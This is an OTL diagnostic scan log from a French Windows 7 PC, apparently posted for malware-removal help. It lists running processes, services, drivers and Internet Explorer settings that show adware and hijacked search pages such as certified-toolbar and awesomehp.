OTL logfile created on: 2/23/2014 11:04:39 AM - Run 1
OTL by OldTimer - Version 3.2.69.0 Folder = C:\Users\APPE-ATELIER\Downloads
Home Premium Edition Service Pack 1 (Version = 6.1.7601) - Type = NTWorkstation
Internet Explorer (Version = 9.11.9600.16518)
Locale: 00000409 | Country: France | Language: FRA | Date Format: dd/MM/yyyy

2.90 Gb Total Physical Memory | 1.90 Gb Available Physical Memory | 65.59% Memory free
5.80 Gb Paging File | 4.56 Gb Available in Paging File | 78.49% Paging File free
Paging file location(s): ?:\pagefile.sys [binary data]

%SystemDrive% = C: | %SystemRoot% = C:\windows | %ProgramFiles% = C:\Program Files
Drive C: | 280.79 Gb Total Space | 229.76 Gb Free Space | 81.82% Space Free | Partition Type: NTFS

Computer Name: ATELIER | User Name: APPE-ATELIER | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: All users
Company Name Whitelist: Off | Skip Microsoft Files: Off | No Company Name Whitelist: On | File Age = 30 Days

[color=#E56717]========== Processes (SafeList) ==========[/color]

PRC - [2014/02/23 11:01:44 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\APPE-ATELIER\Downloads\OTL.exe
PRC - [2014/02/22 19:24:01 | 000,111,392 | ---- | M] () -- C:\Program Files\FindRight\bin\utilFindRight.exe
PRC - [2014/02/21 05:26:24 | 000,111,392 | ---- | M] () -- C:\Program Files\FindRight\updateFindRight.exe
PRC - [2014/02/06 12:29:56 | 003,153,904 | ---- | M] () -- C:\Users\APPE-ATELIER\AppData\Local\fst_fr_83\upfst_fr_83.exe
PRC - [2014/02/04 08:36:10 | 000,090,696 | ---- | M] () -- C:\Program Files\HomeTab\WBrowserDefender.exe
PRC - [2014/01/09 08:16:20 | 000,034,376 | ---- | M] () -- C:\Program Files\HomeTab\WBrowserProductivity.exe
PRC - [2014/01/08 07:06:02 | 001,265,608 | ---- | M] (Objectify Media Inc) -- C:\Program Files\Web Protect\PCProtect.exe
PRC - [2013/12/13 09:39:10 | 000,309,328 | ---- | M] (Google Inc.)
-- C:\Program Files\Google\Google Toolbar\GoogleToolbarUser_32.exe
PRC - [2013/03/07 00:32:44 | 004,767,304 | ---- | M] (AVAST Software) -- C:\Program Files\Alwil Software\Avast5\AvastUI.exe
PRC - [2013/03/07 00:32:44 | 000,045,248 | ---- | M] (AVAST Software) -- C:\Program Files\Alwil Software\Avast5\AvastSvc.exe
PRC - [2012/11/23 03:48:41 | 000,049,152 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\taskhost.exe
PRC - [2011/02/25 06:30:54 | 002,616,320 | ---- | M] (Microsoft Corporation) -- C:\Windows\explorer.exe
PRC - [2009/07/14 02:14:29 | 000,017,408 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\PrintIsolationHost.exe

[color=#E56717]========== Modules (No Company Name) ==========[/color]

MOD - [2014/02/12 13:21:49 | 001,051,136 | ---- | M] () -- C:\windows\assembly\NativeImages_v2.0.50727_32\System.Management\4412bbbb473c356b5ea3e1ea13b25f52\System.Management.ni.dll
MOD - [2014/02/12 13:18:51 | 001,840,640 | ---- | M] () -- C:\windows\assembly\NativeImages_v2.0.50727_32\System.Web.Services\b0f9a4f138cc569a7526f97b93808d3e\System.Web.Services.ni.dll
MOD - [2014/02/12 13:18:40 | 000,628,224 | ---- | M] () -- C:\windows\assembly\NativeImages_v2.0.50727_32\System.EnterpriseSe#\faf3ae85f2470505e1b32d2154de60ef\System.EnterpriseServices.ni.dll
MOD - [2014/02/12 13:18:40 | 000,627,200 | ---- | M] () -- C:\windows\assembly\NativeImages_v2.0.50727_32\System.Transactions\cd3556d1162e8f7df77611c9c4253f7c\System.Transactions.ni.dll
MOD - [2014/02/12 13:18:39 | 006,611,456 | ---- | M] () -- C:\windows\assembly\NativeImages_v2.0.50727_32\System.Data\fe1942c05eda4f9744f80afb4ae76a2d\System.Data.ni.dll
MOD - [2014/02/12 13:18:08 | 012,436,480 | ---- | M] () -- C:\windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\8bc548587e91ecf0552a40e47bbf99cc\System.Windows.Forms.ni.dll
MOD - [2014/02/12 13:18:00 | 001,593,344 | ---- | M] () --
C:\windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\5c24d3b0041ebf4f48a93615b9fa3de9\System.Drawing.ni.dll
MOD - [2014/02/12 13:17:57 | 000,025,600 | ---- | M] () -- C:\windows\assembly\NativeImages_v2.0.50727_32\Accessibility\4f5069e6497e5e6a381ab6aadf05d6a5\Accessibility.ni.dll
MOD - [2014/02/12 13:17:35 | 005,464,064 | ---- | M] () -- C:\windows\assembly\NativeImages_v2.0.50727_32\System.Xml\217ece46920546d718414291d463bb1c\System.Xml.ni.dll
MOD - [2014/02/12 13:17:31 | 000,978,432 | ---- | M] () -- C:\windows\assembly\NativeImages_v2.0.50727_32\System.Configuration\5b6ddf934128d538cd5cd77bf4209b93\System.Configuration.ni.dll
MOD - [2014/02/12 13:17:30 | 007,989,760 | ---- | M] () -- C:\windows\assembly\NativeImages_v2.0.50727_32\System\b3a78269847005365001c33870cd121f\System.ni.dll
MOD - [2014/02/12 13:17:22 | 011,499,520 | ---- | M] () -- C:\windows\assembly\NativeImages_v2.0.50727_32\mscorlib\ede2c6c842840e009f01bcc74fa4c457\mscorlib.ni.dll
MOD - [2014/02/06 12:29:56 | 003,153,904 | ---- | M] () -- C:\Users\APPE-ATELIER\AppData\Local\fst_fr_83\upfst_fr_83.exe
MOD - [2014/02/04 08:36:10 | 000,090,696 | ---- | M] () -- C:\Program Files\HomeTab\WBrowserDefender.exe
MOD - [2014/02/04 06:36:36 | 000,121,416 | ---- | M] () -- C:\Program Files\HomeTab\InstallHelper.dll
MOD - [2014/01/17 12:53:23 | 000,433,000 | ---- | M] () -- C:\program files\plus-hd-5.7\Plus-HD-5.7-buttonutil.dll
MOD - [2014/01/09 08:16:20 | 000,034,376 | ---- | M] () -- C:\Program Files\HomeTab\WBrowserProductivity.exe
MOD - [2013/04/13 14:15:42 | 000,911,128 | ---- | M] () -- C:\windows\assembly\GAC_32\System.Data.SQLite\1.0.66.0__db937bc2d44ff139\System.Data.SQLite.dll
MOD - [2010/11/13 01:58:32 | 000,311,296 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_fr_b77a5c561934e089\mscorlib.resources.dll
MOD - [2010/11/05 03:00:10 | 000,212,992 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\System.resources\2.0.0.0_fr_b77a5c561934e089\System.resources.dll
MOD -
[2010/11/05 02:58:05 | 002,927,616 | ---- | M] () -- C:\windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll
MOD - [2009/06/10 22:23:19 | 000,261,632 | ---- | M] () -- C:\windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll

[color=#E56717]========== Services (SafeList) ==========[/color]

SRV - [2014/02/22 19:24:01 | 000,111,392 | ---- | M] () [Auto | Running] -- C:\Program Files\FindRight\bin\utilFindRight.exe -- (Util FindRight)
SRV - [2014/02/21 05:26:24 | 000,111,392 | ---- | M] () [Auto | Running] -- C:\Program Files\FindRight\updateFindRight.exe -- (Update FindRight)
SRV - [2014/02/16 16:15:27 | 000,146,920 | ---- | M] (SaveSense) [Disabled | Stopped] -- C:\Program Files\SaveSenseLive\Update\SaveSenseLive.exe -- (savesenselivem)
SRV - [2014/02/16 16:15:27 | 000,146,920 | ---- | M] (SaveSense) [Disabled | Stopped] -- C:\Program Files\SaveSenseLive\Update\SaveSenseLive.exe -- (savesenselive)
SRV - [2014/02/13 01:36:33 | 000,118,896 | ---- | M] (Mozilla Foundation) [On_Demand | Stopped] -- C:\Program Files\Mozilla Maintenance Service\maintenanceservice.exe -- (MozillaMaintenance)
SRV - [2014/02/11 19:19:22 | 000,493,568 | ---- | M] (Cherished Technololgy LIMITED) [Disabled | Stopped] -- C:\ProgramData\WPM\wprotectmanager.exe -- (Wpm)
SRV - [2014/02/06 10:47:18 | 000,108,032 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\windows\System32\IEEtwCollector.exe -- (IEEtwCollectorService)
SRV - [2014/01/14 10:04:32 | 000,508,016 | ---- | M] (Cherished Technololgy LIMITED) [Disabled | Stopped] -- C:\ProgramData\IePluginService\PluginService.exe -- (IePluginService)
SRV - [2014/01/08 07:06:02 | 001,265,608 | ---- | M] (Objectify Media Inc) [On_Demand | Running] -- C:\Program Files\Web Protect\PCProtect.exe -- (PCProtect)
SRV - [2013/12/21 07:04:16 | 000,065,432 | ---- | M] (Adobe Systems Incorporated) [Disabled | Stopped] -- C:\Program Files\Common Files\Adobe\ARM\1.0\armsvc.exe --
(AdobeARMservice)
SRV - [2013/11/25 19:07:48 | 000,355,584 | ---- | M] (TuneUp Software GmbH) [Disabled | Stopped] -- C:\Windows\System32\TuneUpDefragService.exe -- (TuneUp.Defrag)
SRV - [2013/05/27 05:57:27 | 000,680,960 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Program Files\Windows Defender\mpsvc.dll -- (WinDefend)
SRV - [2013/04/26 21:56:48 | 000,463,656 | ---- | M] (AnchorFree Inc.) [Disabled | Stopped] -- C:\Program Files\Hotspot Shield\HssWPR\hsssrv.exe -- (HssSrv)
SRV - [2013/04/24 20:29:56 | 000,078,512 | ---- | M] () [Disabled | Stopped] -- C:\Program Files\Hotspot Shield\bin\HssTrayService.EXE -- (HssTrayService)
SRV - [2013/04/12 11:37:24 | 000,031,744 | ---- | M] () [Disabled | Stopped] -- C:\Program Files\SoftwareUpdater\UpdaterService.exe -- (SrvUpdater)
SRV - [2013/03/07 00:32:44 | 000,045,248 | ---- | M] (AVAST Software) [Auto | Running] -- C:\Program Files\Alwil Software\Avast5\AvastSvc.exe -- (avast! Antivirus)
SRV - [2012/03/25 19:00:54 | 000,254,034 | ---- | M] (IDT, Inc.)
[Disabled | Stopped] -- C:\Program Files\IDT\WDM\STacSV.exe -- (STacSV)
SRV - [2012/03/25 19:00:53 | 000,081,920 | ---- | M] (Andrea Electronics Corporation) [Disabled | Stopped] -- C:\Program Files\IDT\WDM\aestsrv.exe -- (AESTFilters)
SRV - [2011/10/17 15:51:54 | 000,013,824 | ---- | M] (Hewlett-Packard Company) [Disabled | Stopped] -- C:\Program Files\HP\HPBDSService\HPBDSService.exe -- (HP DS Service)
SRV - [2011/09/09 17:10:28 | 000,086,072 | ---- | M] (Hewlett-Packard Company) [Disabled | Stopped] -- C:\Program Files\Hewlett-Packard\HP Support Framework\hpsa_service.exe -- (HP Support Assistant Service)
SRV - [2011/03/28 17:07:50 | 000,094,264 | ---- | M] (Hewlett-Packard Company) [Disabled | Stopped] -- C:\Program Files\Hewlett-Packard\Shared\HPDrvMntSvc.exe -- (HPDrvMntSvc.exe)
SRV - [2010/12/11 18:58:00 | 001,343,400 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\System32\Wat\WatAdminSvc.exe -- (WatAdminSvc)
SRV - [2010/01/28 17:21:26 | 000,265,272 | ---- | M] (Hewlett-Packard Company) [Disabled | Stopped] -- C:\Program Files\Hewlett-Packard\HP HotKey Support\hpHotkeyMonitor.exe -- (hpHotkeyMonitor)
SRV - [2010/01/08 22:55:54 | 000,354,840 | ---- | M] (Intel Corporation) [Disabled | Stopped] -- C:\Program Files\Intel\Intel Matrix Storage Manager\IAANTMon.exe -- (IAANTMON)
SRV - [2009/11/23 19:08:10 | 001,120,752 | ---- | M] (Sonic Solutions) [Disabled | Stopped] -- c:\Program Files\Common Files\Roxio Shared\10.0\SharedCOM\RoxMediaDB10.exe -- (RoxMediaDB10)
SRV - [2009/11/02 21:12:02 | 000,014,336 | ---- | M] (LSI Corporation) [Disabled | Stopped] -- C:\Program Files\LSI SoftModem\agrsmsvc.exe -- (AgereModemAudio)
SRV - [2009/07/14 02:16:13 | 000,025,088 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\System32\sensrsvc.dll -- (SensrSvc)
SRV - [2008/05/29 09:28:54 | 000,028,416 | ---- | M] (TuneUp Software GmbH) [Auto | Stopped] -- C:\Windows\System32\uxtuneup.dll -- (UxTuneUp)
SRV - [2007/07/24 19:15:14 |
000,185,632 | ---- | M] (Protexis Inc.) [Disabled | Stopped] -- c:\Program Files\Common Files\Protexis\License Service\PsiService_2.exe -- (PSI_SVC_2)

[color=#E56717]========== Driver Services (SafeList) ==========[/color]

DRV - File not found [Kernel | On_Demand | Stopped] -- system32\DRIVERS\GEARAspiWDM.sys -- (GEARAspiWDM)
DRV - [2014/01/08 07:09:36 | 000,020,480 | ---- | M] () [Kernel | System | Running] -- C:\Windows\System32\drivers\pcwatch.sys -- (pcwatch)
DRV - [2013/12/26 10:12:36 | 000,040,776 | ---- | M] (Malwarebytes Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\mbamswissarmy.sys -- (MBAMSwissArmy)
DRV - [2013/04/24 20:25:44 | 000,037,064 | ---- | M] (Anchorfree Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\taphss6.sys -- (taphss6)
DRV - [2013/04/24 20:12:34 | 000,040,648 | ---- | M] (AnchorFree Inc.) [Kernel | System | Running] -- C:\Windows\System32\drivers\hssdrv6.sys -- (HssDRV6)
DRV - [2013/03/07 00:33:24 | 000,765,736 | ---- | M] (AVAST Software) [File_System | System | Stopped] -- C:\windows\System32\drivers\aswSnx.sys -- (aswSnx)
DRV - [2013/03/07 00:33:24 | 000,368,176 | ---- | M] (AVAST Software) [Kernel | System | Running] -- C:\windows\System32\drivers\aswSP.sys -- (aswSP)
DRV - [2013/03/07 00:33:24 | 000,164,736 | ---- | M] () [Kernel | On_Demand | Stopped] -- C:\windows\System32\drivers\aswVmm.sys -- (aswVmm)
DRV - [2013/03/07 00:33:24 | 000,062,376 | ---- | M] (AVAST Software) [Kernel | System | Running] -- C:\windows\System32\drivers\aswTdi.sys -- (aswTdi)
DRV - [2013/03/07 00:33:24 | 000,049,248 | ---- | M] () [Kernel | Boot | Running] -- C:\windows\System32\drivers\aswRvrt.sys -- (aswRvrt)
DRV - [2013/03/07 00:33:23 | 000,066,336 | ---- | M] (AVAST Software) [File_System | Auto | Running] -- C:\Windows\System32\drivers\aswMonFlt.sys -- (aswMonFlt)
DRV - [2013/03/07 00:33:23 | 000,060,656 | ---- | M] (AVAST Software) [Kernel | System | Running] -- C:\Windows\System32\drivers\aswRdr2.sys
-- (aswRdr)
DRV - [2013/03/07 00:33:22 | 000,029,816 | ---- | M] (AVAST Software) [File_System | Auto | Running] -- C:\windows\System32\drivers\aswFsBlk.sys -- (aswFsBlk)
DRV - [2012/10/30 23:51:56 | 000,020,624 | ---- | M] (AVAST Software) [Kernel | System | Running] -- C:\windows\System32\drivers\aswKbd.sys -- (aswKbd)
DRV - [2012/03/25 19:00:55 | 000,431,616 | ---- | M] (IDT, Inc.) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\stwrt.sys -- (STHDA)
DRV - [2011/05/18 08:09:04 | 000,040,320 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\dc3d.sys -- (dc3d)
DRV - [2010/11/20 11:24:41 | 000,052,224 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\TsUsbFlt.sys -- (TsUsbFlt)
DRV - [2010/11/20 10:59:44 | 000,035,968 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\winusb.sys -- (WinUsb)
DRV - [2010/04/27 09:24:50 | 001,763,968 | ---- | M] () [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\snp2uvc.sys -- (SNP2UVC)
DRV - [2010/01/20 02:55:06 | 000,996,896 | ---- | M] (Realtek Semiconductor Corporation ) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\rtl8192se.sys -- (rtl8192se)
DRV - [2009/11/02 21:11:56 | 001,163,328 | ---- | M] (LSI Corporation) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\AGRSM.sys -- (AgereSoftModem)
DRV - [2009/07/16 21:16:50 | 000,015,872 | ---- | M] (Hewlett-Packard Development Company, L.P.)
[Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\HpqKbFiltr.sys -- (HpqKbFiltr)
DRV - [2009/07/14 00:52:10 | 000,014,336 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\vwifimp.sys -- (vwifimp)
DRV - [2009/07/14 00:12:52 | 000,030,720 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\tpm.sys -- (TPM)
DRV - [2009/07/09 22:44:50 | 000,122,880 | ---- | M] (Intel(R) Corporation) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\IntcHdmi.sys -- (IntcHdmiAddService)

[color=#E56717]========== Standard Registry (SafeList) ==========[/color]

[color=#E56717]========== Internet Explorer ==========[/color]

IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.awesomehp.com/?type=hp&ts=1392142712&from=tugs&uid=TOSHIBAXMK3256GSY_407CFENYSXX407CFENYS
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Search_URL = http://search.certified-toolbar.com?si=62606&tid=6533&ver=5.7&ts=1377589244254.000007&tguid=62606-6533-1377589244254-6B98A6F067D7FFE4FE0E4F558E5BB9B6&st=chrome&q=
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Search Bar = http://search.certified-toolbar.com?si=62606&tid=6533&ver=5.7&ts=1377589244254.000007&tguid=62606-6533-1377589244254-6B98A6F067D7FFE4FE0E4F558E5BB9B6&st=chrome&q=
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Search Page = http://search.certified-toolbar.com?si=62606&tid=6533&ver=5.7&ts=1377589244254.000007&tguid=62606-6533-1377589244254-6B98A6F067D7FFE4FE0E4F558E5BB9B6&st=chrome&q=
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Start Default_Page_URL = about:newtab
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = about:newtab
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Search,Default_Search_URL = http://search.certified-toolbar.com?si=62606&tid=6533&ver=5.7&ts=1377589244254.000007&tguid=62606-6533-1377589244254-6B98A6F067D7FFE4FE0E4F558E5BB9B6&st=chrome&q=
IE
- HKLM\SOFTWARE\Microsoft\Internet Explorer\Search,Search Bar = http://search.certified-toolbar.com?si=62606&tid=6533&ver=5.7&ts=1377589244254.000007&tguid=62606-6533-1377589244254-6B98A6F067D7FFE4FE0E4F558E5BB9B6&st=chrome&q=
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Search,Search Page = http://search.certified-toolbar.com?si=62606&tid=6533&ver=5.7&ts=1377589244254.000007&tguid=62606-6533-1377589244254-6B98A6F067D7FFE4FE0E4F558E5BB9B6&st=chrome&q=
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Search,SearchAssistant =
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Search,Start Default_Page_URL = about:newtab
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Search,Start Page = about:newtab
IE - HKLM\..\URLSearchHook: {09a07b02-f491-4b6b-bfc9-684a624f4f3b} - C:\Program Files\Reverso\prxtbReve.dll (Conduit Ltd.)
IE - HKLM\..\URLSearchHook: {6ec85fcf-87ad-41d7-ae1f-f116f8ad4848} - C:\Program Files\Avanquest_FR\prxtbAva2.dll (Conduit Ltd.)
IE - HKLM\..\SearchScopes,DefaultScope = {afdbddaa-5d3f-42ee-b79c-185a7020515b}
IE - HKLM\..\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}: "URL" = http://www.awesomehp.com/web/?type=ds&ts=1392142712&from=tugs&uid=TOSHIBAXMK3256GSY_407CFENYSXX407CFENYS&q={searchTerms}
IE - HKLM\..\SearchScopes\{6A1806CD-94D4-4689-BA73-E35EA1EA9990}: "URL" = http://search.certified-toolbar.com?si=62606&st=bs&tid=6533&ver=4.9&ts=1377589244254.000007&tguid=62606-6533-1377589244254-6B98A6F067D7FFE4FE0E4F558E5BB9B6&q={searchTerms}
IE - HKLM\..\SearchScopes\{80B7D2F3-3D57-4CF6-A8A6-3292946EC73F}: "URL" = http://www.bing.com/search?q={searchTerms}&form=CMNTDF&pc=CMNTDF&src=IE-SearchBox
IE - HKLM\..\SearchScopes\{9BB47C17-9C68-4BB3-B188-DD9AF0FD2101}: "URL" = http://www.searchqu.com/web?src=ieb&appid=0&systemid=101&sr=0&q={searchTerms}
IE - HKLM\..\SearchScopes\{9BB47C17-9C68-4BB3-B188-DD9AF0FD2406}: "URL" = http://dts.search-results.com/sr?src=ieb&appid=189&systemid=406&sr=0&q={searchTerms}
IE -
HKLM\..\SearchScopes\{afdbddaa-5d3f-42ee-b79c-185a7020515b}: "URL" = http://search.certified-toolbar.com?si=62606&st=bs&tid=6533&ver=5.7&ts=1377589244254.000007&tguid=62606-6533-1377589244254-6B98A6F067D7FFE4FE0E4F558E5BB9B6&q={searchTerms}
IE - HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
IE - HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
IE - HKU\S-1-5-21-784627312-1147448306-2395707560-1001\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Search_URL = http://search.certified-toolbar.com?si=62606&tid=6533&ver=5.7&ts=1377589244254.000007&tguid=62606-6533-1377589244254-6B98A6F067D7FFE4FE0E4F558E5BB9B6&st=chrome&q=
IE - HKU\S-1-5-21-784627312-1147448306-2395707560-1001\SOFTWARE\Microsoft\Internet Explorer\Main,Search Bar = http://search.certified-toolbar.com?si=62606&tid=6533&ver=5.7&ts=1377589244254.000007&tguid=62606-6533-1377589244254-6B98A6F067D7FFE4FE0E4F558E5BB9B6&st=chrome&q=
IE - HKU\S-1-5-21-784627312-1147448306-2395707560-1001\SOFTWARE\Microsoft\Internet Explorer\Main,Search Page = http://search.certified-toolbar.com?si=62606&tid=6533&ver=5.7&ts=1377589244254.000007&tguid=62606-6533-1377589244254-6B98A6F067D7FFE4FE0E4F558E5BB9B6&st=chrome&q=
IE - HKU\S-1-5-21-784627312-1147448306-2395707560-1001\SOFTWARE\Microsoft\Internet Explorer\Main,SearchDefaultBranded = 1
IE - HKU\S-1-5-21-784627312-1147448306-2395707560-1001\SOFTWARE\Microsoft\Internet Explorer\Main,Start Default_Page_URL = about:newtab
IE - HKU\S-1-5-21-784627312-1147448306-2395707560-1001\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.aliceadsl.fr/
IE - HKU\S-1-5-21-784627312-1147448306-2395707560-1001\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = http://fr.msn.com/
IE - HKU\S-1-5-21-784627312-1147448306-2395707560-1001\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = fr-FR
IE -
HKU\S-1-5-21-784627312-1147448306-2395707560-1001\SOFTWARE\Microsoft\Internet Explorer\Search,Default_Search_URL = http://search.certified-toolbar.com?si=62606&tid=6533&ver=5.7&ts=1377589244254.000007&tguid=62606-6533-1377589244254-6B98A6F067D7FFE4FE0E4F558E5BB9B6&st=chrome&q=
IE - HKU\S-1-5-21-784627312-1147448306-2395707560-1001\SOFTWARE\Microsoft\Internet Explorer\Search,Search Bar = http://search.certified-toolbar.com?si=62606&tid=6533&ver=5.7&ts=1377589244254.000007&tguid=62606-6533-1377589244254-6B98A6F067D7FFE4FE0E4F558E5BB9B6&st=chrome&q=
IE - HKU\S-1-5-21-784627312-1147448306-2395707560-1001\SOFTWARE\Microsoft\Internet Explorer\Search,Search Page = http://search.certified-toolbar.com?si=62606&tid=6533&ver=5.7&ts=1377589244254.000007&tguid=62606-6533-1377589244254-6B98A6F067D7FFE4FE0E4F558E5BB9B6&st=chrome&q=
IE - HKU\S-1-5-21-784627312-1147448306-2395707560-1001\SOFTWARE\Microsoft\Internet Explorer\Search,Start Default_Page_URL = about:newtab
IE - HKU\S-1-5-21-784627312-1147448306-2395707560-1001\SOFTWARE\Microsoft\Internet Explorer\Search,Start Page = about:newtab
IE - HKU\S-1-5-21-784627312-1147448306-2395707560-1001\..\SearchScopes,DefaultScope = {afdbddaa-5d3f-42ee-b79c-185a7020515b}
IE - HKU\S-1-5-21-784627312-1147448306-2395707560-1001\..\SearchScopes\{014DB5FA-EAFB-4592-A95B-F44D3EE87FA9}: "URL" = http://search.conduit.com/Results.aspx?ctid=CT3324332&octid=EB_ORIGINAL_CTID&SearchSource=58&CUI=&UM=4&UP=SP924F91EA-BE8A-4F23-920E-4F372C22FB6E&q={searchTerms}&SSPV=
IE - HKU\S-1-5-21-784627312-1147448306-2395707560-1001\..\SearchScopes\{0D7562AE-8EF6-416d-A838-AB665251703A}: "URL" = http://start.facemoods.com/?a=aed&s={searchTerms}&f=4
IE - HKU\S-1-5-21-784627312-1147448306-2395707560-1001\..\SearchScopes\{0ECDF796-C2DC-4d79-A620-CCE0C0A66CC9}: "URL" = http://search.certified-toolbar.com?si=62606&st=bs&tid=6533&ver=4.9&ts=1377589244254.000007&tguid=62606-6533-1377589244254-6B98A6F067D7FFE4FE0E4F558E5BB9B6&q={searchTerms}
IE -
HKU\S-1-5-21-784627312-1147448306-2395707560-1001\..\SearchScopes\{2331091A-2BE8-40D5-80E7-549466B352FE}: "URL" = http://search.softonic.com/MOY00005/tb_v1?q={searchTerms}&SearchSource=4&cc=&mi=4c91cd4a00000000000070f1a14163a3&toi=16087&r=33
IE - HKU\S-1-5-21-784627312-1147448306-2395707560-1001\..\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}: "URL" = http://www.awesomehp.com/web/?type=ds&ts=1392142712&from=tugs&uid=TOSHIBAXMK3256GSY_407CFENYSXX407CFENYS&q={searchTerms}
IE - HKU\S-1-5-21-784627312-1147448306-2395707560-1001\..\SearchScopes\{6A1806CD-94D4-4689-BA73-E35EA1EA9990}: "URL" = http://www.google.com/search?q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&sourceid=ie7&rlz=1I7GGHP_frFR473
IE - HKU\S-1-5-21-784627312-1147448306-2395707560-1001\..\SearchScopes\{80B7D2F3-3D57-4CF6-A8A6-3292946EC73F}: "URL" = http://www.bing.com/search?q={searchTerms}&form=CMNTDF&pc=CMNTDF&src=IE-SearchBox
IE - HKU\S-1-5-21-784627312-1147448306-2395707560-1001\..\SearchScopes\{9BB47C17-9C68-4BB3-B188-DD9AF0FD2101}: "URL" = http://www.searchqu.com/web?src=ieb&appid=0&systemid=101&sr=0&q={searchTerms}
IE - HKU\S-1-5-21-784627312-1147448306-2395707560-1001\..\SearchScopes\{9BB47C17-9C68-4BB3-B188-DD9AF0FD2406}: "URL" = http://dts.search-results.com/sr?src=ieb&appid=189&systemid=406&sr=0&q={searchTerms}
IE - HKU\S-1-5-21-784627312-1147448306-2395707560-1001\..\SearchScopes\{9D5BD211-422C-4164-9298-BB4186A30F31}: "URL" = http://www.bing.com/search?q={searchTerms}&mkt=fr-FR&form=MKTIE9
IE - HKU\S-1-5-21-784627312-1147448306-2395707560-1001\..\SearchScopes\{AFDBDDAA-5D3F-42EE-B79C-185A7020515B}: "URL" = http://search.certified-toolbar.com?si=62606&st=bs&tid=6533&ver=5.7&ts=1377589244254.000007&tguid=62606-6533-1377589244254-6B98A6F067D7FFE4FE0E4F558E5BB9B6&q={searchTerms}
IE - HKU\S-1-5-21-784627312-1147448306-2395707560-1001\..\SearchScopes\{B39C149F-B614-4765-AB0E-DFC7A0D1DEF6}: "URL" =
http://search.conduit.com/ResultsExt.aspx?q={searchTerms}&SearchSource=4&ctid=CT2089011&CUI=UN15040909481511029&UM=1
IE - HKU\S-1-5-21-784627312-1147448306-2395707560-1001\..\SearchScopes\{b41306c6-96d0-442a-bcc4-b0f621e82ce9}: "URL" = http://www.fissa.com/fr/results/?s=b&c=11010210965&suid=EmN4rTV0o&d=5&pid=30&q={searchTerms}
IE - HKU\S-1-5-21-784627312-1147448306-2395707560-1001\..\SearchScopes\{B521A443-6FE6-49B9-9101-B2D35E268160}: "URL" = http://asksearch.ask.com/redirect?client=ie&src=kw&tb=KMPV6&itbv=11.8.1.343&o=APN10749&locale=fr_FR&apn_uid=0DABCBC1-74C3-4EDE-ACF6-ACAC0B274F0A&apn_ptnrs=^AUC&apn_dtid=^YYYYYY^YY^FR&apn_dbr=ie_10.0.9200.16576&doi=2013-05-31&q={searchTerms}&
IE - HKU\S-1-5-21-784627312-1147448306-2395707560-1001\..\SearchScopes\{B5E88050-BE39-42EE-9385-CF79402863A4}: "URL" = http://search.certified-toolbar.com?si=62606&st=bs&tid=6533&ver=4.6&ts=1377589244254.000007&tguid=62606-6533-1377589244254-6B98A6F067D7FFE4FE0E4F558E5BB9B6&q={searchTerms}
IE - HKU\S-1-5-21-784627312-1147448306-2395707560-1001\..\SearchScopes\{EC84EDD1-3C74-462B-B589-EDB2B5A014EA}: "URL" = http://start.funmoods.com/results.php?f=4&a=ironto&q={searchTerms}
IE - HKU\S-1-5-21-784627312-1147448306-2395707560-1001\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
IE - HKU\S-1-5-21-784627312-1147448306-2395707560-1001\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyOverride" =
